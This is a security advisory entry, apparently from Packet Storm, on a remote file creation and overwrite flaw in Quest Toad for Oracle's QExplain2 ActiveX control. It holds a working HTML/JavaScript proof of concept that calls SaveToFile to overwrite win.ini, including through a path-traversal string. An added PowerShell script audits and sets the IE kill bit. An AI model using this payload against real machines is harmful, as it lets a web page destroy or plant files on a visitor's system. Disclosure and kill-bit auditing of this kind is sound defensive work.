Quest Toad For Oracle Explain Plan Display File Creation / Overwrite

2012-04-06T00:00:00
ID PACKETSTORM:111632
Type packetstorm
Reporter rgod
Modified 2012-04-06T00:00:00

Description

                                        
`<!--
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)  
Remote File Creation / Overwrite   
  
vendor site: http://www.quest.com/  
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe  
  
CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}  
Progid: QExplain2.ExplainPlanDisplayX  
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL  
Implements IObjectSafety: True  
Safe For Initialization (IObjectSafety): True  
Safe For Scripting (IObjectSafety): True  
  
rgod  
-->  
<!-- saved from url=(0014)about:internet -->   
<html>  
<object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 />  
</object>  
<script>  
try{  
obj.SaveToFile("c:\\windows\\win.ini");  
}catch(e){  
}  
  
try{  
obj.SaveToFile("../../../../../../../../../../windows/win.ini");  
}catch(e){  
}  
</script>  
  
original url: http://retrogod.altervista.org/9sg_quest_toad_poc.htm  
`
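
A defensive check for the control described above, as an added example that is not part of the original advisory: it reports whether the CLSID from the advisory is registered on a host and whether the Internet Explorer kill bit is set for it, and sets the kill bit when asked. The CLSID comes from the advisory. The `ActiveX Compatibility` key and the `0x400` flag are the standard IE kill-bit mechanism, which stops IE from instantiating a control regardless of what it reports through IObjectSafety. The `-Apply` switch is a hypothetical parameter of this script.

```powershell
# Added example (not from the advisory): audit, and optionally set, the IE kill bit
# for the QExplain2 control. Save as a .ps1 file; use -Apply from an elevated prompt.
param([switch]$Apply)   # hypothetical switch: without it the script only reports

$Clsid   = '{F7014877-6F5A-4019-A3B2-74077F2AE126}'   # CLSID listed in the advisory
$KillBit = 0x400                                       # "Compatibility Flags" kill-bit value

# Native registry view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Roots = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\Wow6432Node'

foreach ($root in $Roots) {
    if (-not (Test-Path -Path $root)) { continue }

    $server = Join-Path $root "Classes\CLSID\$Clsid\InprocServer32"
    $compat = Join-Path $root "Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

    # Is the control installed in this registry view?
    $registered = Test-Path -Path $server

    # Read the current compatibility flags, treating a missing key or value as 0.
    $flags = 0
    if (Test-Path -Path $compat) {
        $prop = Get-ItemProperty -Path $compat -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
    }
    $killed = ($flags -band $KillBit) -ne 0

    # Set the kill bit, preserving any other flags already present.
    if ($Apply -and -not $killed) {
        if (-not (Test-Path -Path $compat)) { New-Item -Path $compat -Force | Out-Null }
        New-ItemProperty -Path $compat -Name 'Compatibility Flags' -PropertyType DWord `
            -Value ($flags -bor $KillBit) -Force | Out-Null
        $killed = $true
    }

    [pscustomobject]@{
        RegistryView      = $root
        ControlRegistered = $registered
        KillBitSet        = $killed
    }
}
```

A host that shows `ControlRegistered = True` with `KillBitSet = False` in either view can still load the control from a web page in Internet Explorer.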